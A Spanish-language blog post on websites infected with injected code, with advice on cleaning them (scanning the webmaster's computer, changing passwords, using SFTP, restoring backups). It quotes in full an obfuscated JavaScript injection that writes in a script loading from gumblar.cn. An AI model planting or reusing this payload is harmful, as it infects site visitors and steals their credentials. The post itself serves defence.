Código malicioso en sitio web, pagina web infectada con virus

Los virus que atacan sitios web se han puesto muy comunes en Internet, se trata de la inyección de código malicioso en un sitio el cual intenta infectar las maquinas de los visitantes para obtener información sensible: usuario, contraseña de nuevos sitios web y así seguir propagandose en la red.
El usuario la mayoria de las veces adjudica el problema al proveedor de hosting, pero la verdad es que en todos los casos que nos ha tocado ver el problema radica en la maquina local del webmaster troyanizada.
Leyendo en algunos foros sobre el tema me he encontrado con códigos del tipo:

(function(jil){var xR5p='%';e val(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);

El código malicioso ejecuta un iframe en el sitio vulnerado para intentar infectar directamente a los visitantes. He detectado también que las paginas ejecutadas en los iframe tienen TLD .ru ó .cn.

Solucionando el problema, eliminar virus

El primer paso a seguir para eliminar el virus del sitio web, es ejecutar un buen antivirus en el computador del encargado de las claves de acceso al hosting, ya que de ahi se genera el problema. Intente instalar Antivirus, Antitroyanos, Antispyware en su computador y asegurarse que no tenga virus.

Teniendo seguro nuestro equipo podemos proceder a hacer el cambio de contraseñas, no las almacene en el software que utiliza para subir archivos.

Lo ideal es luego utilizar conexión a su sitio via SFTP que generalmente se ejecuta en el puerto 22.

Intente eliminar todo rastro de codigo malicioso de las paginas web de su sitio, lo ideal es restaurar algun backup reciente que no haya estado infectado para evitar que quede algun codigo malicioso.

Esta infección se aloja en archivos .php .html .htm .js por lo que hay que ser muy cauteloso al momento de revisar y eliminarlo. Mejor buscamos un backup cercano a la fecha de la infección.

  1. Información a 12.FEB.2012
    En mi web se me ha colado en todos los html y php este código:

    Todavia no he descubierto como ha llegado, pero he tenido que eliminarlo de varios sitios. Tambien habia un index.php que he suprimido